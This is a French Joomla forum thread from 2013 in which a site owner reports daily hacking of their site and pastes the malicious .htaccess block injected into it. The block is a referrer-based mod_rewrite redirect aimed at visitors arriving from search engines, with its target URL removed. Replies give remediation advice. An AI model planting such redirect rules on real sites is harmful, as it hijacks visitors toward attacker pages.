Attaque et modification pirate du fichier htaccess

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] Attaque et modification pirate du fichier htaccess

    Bonjour,
    Je suis victime chaque jour d'une "attaque" qui a pour effet de rendre inaccessible mon site.
    Quand j'accède aux fichiers via FTP, je vois que mon fichier .htaccess est modifié chaque jour par l'ajout de slignes suivantes
    Code:
    #5d30bb#
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
    RewriteRule ^(.*)$[R=301,L]
    </IfModule>
    
    #/5d30bb#
    Les fichiers index.php des templates du site sont modifiés aussi.

    J'arrive à rendre à nouveau le site accessible normalement en effaçant les fchiers modifiés et en remettant l'original à partir d'une sauvegarde que j'avais faite.

    Une suggestion pour protection et pour la source du problème ?? Un module certainement mais lequel ?? Ou existe t'i un moyen de verrouiller le fichier .htaccess quelle que soit la source de la fuite, en attendant de la trouver...
    Dernière édition par zepelin57 à 14/05/2013, 22h25 Raison: Mis en code et suppression du lien vers la redirection piratée

  • #2
    Re : Attaque et modification pirate du fichier htaccess

    Bonsoir
    est ce que ton site est a jour --> 2.5.11 ?
    est ce que tes extentions utilisées sont à jour ?

    Quand tu remets ta sauvegarde ... comment procédes tu ?
    Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
    Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

    Commentaire


    • #3
      Re : Attaque et modification pirate du fichier htaccess

      [MODO]Sujet déplacé dans la bonne section du forum[/MODO]

      Et profites pour lire cet espace.

      Commentaire


      • #4
        Re : Attaque et modification pirate du fichier htaccess

        Merci de vos reponses et désolé d'avoir créé la discussion à un endroit inapproprié !
        La version de Joomla! est à jour : 2.5.11
        A priori les composants et modules sont tous à jour, mais certains sont vieux
        aucun composant ou module ou template qui provienne d'un téléchargement parallèle : tout est clair et légal.
        J'avais modifié hier le fichier .htaccess afin qu'il ne soit plus modifiable, acheté admintools d'Akeeba mais après plusieurs alertes (chaque 9 minutes) dans la soirée, une adresse ip mise en liste noire, ça s'est arreté... pour reprendre au milieu de la nuit.
        Et avoir à nouveau le fichier .htaccess modifié, les fichiers index.php des templates modifiés, et le site à nouveau inaccessible.
        J'ai tout remis en supprimant les fichirs modifés et en les remplaçant par ceux d'origine : tout est à nouveau OK.
        J'ai donc exploré plus attentitvement tous les modules et composants pour voir s'il y avait eu d'autres modifs qui seraient passées inaperçues et j'ai vu qu'un fichier XML d'un module dont le contenu est pourtant statique a été modifié à la meme heure que les autres : pourrait il etre la source du problème ou n'est ce pas un signe ?
        En attendant, je l'ai desinstallé purement et simplement. Si tous les soucis cessent je ne pourrai m'empercher de fair ele lien et j'en donnerai alors le nom et j'en informerai l'éditeur !
        A suivre (pendant ce temps je procède à tous les changements dans les fichiers systèmes sur les recommandations trouvées sur ce forum)

        Commentaire


        • #5
          Re : Attaque et modification pirate du fichier htaccess

          et changes tes mot de passe ftp ... si une machine les a récupéré cela pourrait expliquer les modifs
          aidons nous les uns les autres ...

          https://www.web54.fr

          Commentaire


          • #6
            Re : Attaque et modification pirate du fichier htaccess

            Voila : MAGIC PRICE TABLE !!!!
            que je remplacerai donc par Comparison Chart déjà utilisé ailleurs et très bien
            Merci à tous pour les conseils et autre soutien et je vais potasser ce volet de la sécurité plus particulièrement

            Commentaire

            Annonce

            Réduire
            Aucune annonce pour le moment.

            Partenaire de l'association

            Réduire

            Hébergeur Web PlanetHoster
            Travaille ...
            X